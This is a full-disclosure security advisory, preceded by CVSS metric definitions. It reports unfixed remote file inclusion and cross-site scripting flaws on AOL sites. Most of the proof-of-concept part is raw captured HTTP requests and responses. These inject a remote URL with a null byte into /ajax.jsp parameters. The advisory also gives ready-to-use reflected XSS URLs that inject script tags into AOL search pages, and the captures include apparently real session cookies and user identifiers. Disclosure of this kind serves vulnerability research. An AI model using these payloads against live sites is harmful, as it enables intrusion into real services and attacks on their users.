The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
Low
I
Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability
Low
A
There is reduced performance or interruptions in resource availability. However, the attacker does not have the ability to completely prevent access to the resources or services; the impact is limited.
Below is a copy: AOL File Inclusion / Cross Site ScrIpting
AOL File Inclusion / Cross Site ScrIpting
*******************************
Time-Line vulnerability
------------------------
-Multiples Security Advisories
-Not Response
-Not FeedBack
-Not Fixed
-Another Security Advisory ( & another..)
-Not Response-Not FeedBack
-Full Disclosure
I. VULNERABILITY
-------------------------
#Title: AOL File Inclusion / Cross Site Scrpting
#Vendor:http://www.aol.com
#Author: Juan Carlos Garca (@secnight)
https://habemuscurso.blogspot.com
II. DESCRIPTION
-------------------------
AOL Inc. (previously known as America Online, written as AOL and styled as "Aol." but commonly pronounced as an initialism) is an American multinational mass media corporation based in New York City that develops, grows, and invests in brands and web sites.
The company's business spans digital distribution of content, products, and services, which it offers to consumers,publishers, and advertisers.
Founded in 1983 as Control Video Corporation, an online services company by Jim Kimsey from the remnants of Control Video Corporation, AOL has franchised its services to companies in several nations around the world or to set up international versions of its services.AOL is headquartered at 770 Broadway in New York..
(Wikipedia)
III-Proof Of Concept
------------------
Remote File Inclusion
*******************
Vulnerability description
---------------------------
This script is vulnerable to file inclusion attacks.
It seems that this script includes a file which name is determined using user-supplied data.
This data is not properly validated before being passed to the include function.
Affected items
----------------
/ajax.jsp (5)
The impact of this vulnerability
--------------------------------
It is possible for a remote attacker to include a file from local or remote resources and/or
execute arbitrary script code with the privileges of the web-server.
How to fix this vulnerability
------------------------------
Edit the source code to ensure that input is properly validated. Where is possible, it is recommended to make a list of accepted filenames and restrict the input to that list.
Attack details
-----------------
URL encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available
GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-
config&_c=main5 HTTP/1.1
Referer: http://www.aol.com:80/
Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;
s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;
JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D
Response
HTTP/1.1 200 OK
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
x-ua-compatible: IE=EmulateIE9
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 130
Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol
Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Variant 1
-----------
URL encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available
Request
GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-
config&_c=main5 HTTP/1.1
Referer: http://www.aol.com:80/
Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;
s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;
JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA
%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;
rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D
Response
HTTP/1.1 200 OK
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
x-ua-compatible: IE=EmulateIE9
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 130
Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol
Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Variant 3
---------
URL encoded GET input p was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available
Request
GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-
config&_c=main5 HTTP/1.1
Referer: http://www.aol.com:80/
Cookie:
tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;
s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;
JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D
Variant 4
---------
Attack details
----------------
URL encoded GET input p was set to http://some-inexistent website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available
GET /ajax.jsp?ajax=1&cv=6&dlItem=431789&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistentwebsite.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5
HTTP/1.1
Referer: http://www.aol.com:80/
Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;
s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;
JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D
Response
----------
HTTP/1.1 200 OK
Cache-Control: max-age=5
Connection: Keep-Alive
Via: AOL-CACHE
x-ua-compatible: IE=EmulateIE9
Pragma: no-cache
test-timestamp: 1390300006644
Content-Type: text/javascript;charset=UTF-8
Content-Length: 142
Keep-Alive: timeout=5, max=100
Cross Site Scripting
*********************
http://search.aol.com/aol/webhome?s_chn=%3C/script%3E%3Cscript%3Ealert%28%22Secnight%20and%20BTshell%22%29;%3C/script%3E%3Cscript%3E
http://search.aol.co.uk/aol/webhome?s_chn=%3C%2Fscript%3E%3Cscript%3Ealert%28%22Secnight+and+BTshell+says..+Security+Advisory%3A+Not+FeedBack+Not+Response+Not+Fixed..+Full+Disclosure+asap-sec.com%22%29%3B%3C%2Fscript%3E%3Cscript%3E
IV-Authors:
-----------
Juan Carlos Garca @secnight
LEGAL NOTICES
--------------
The Author accepts no responsibility for any damage caused by the use or misuse of this information.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum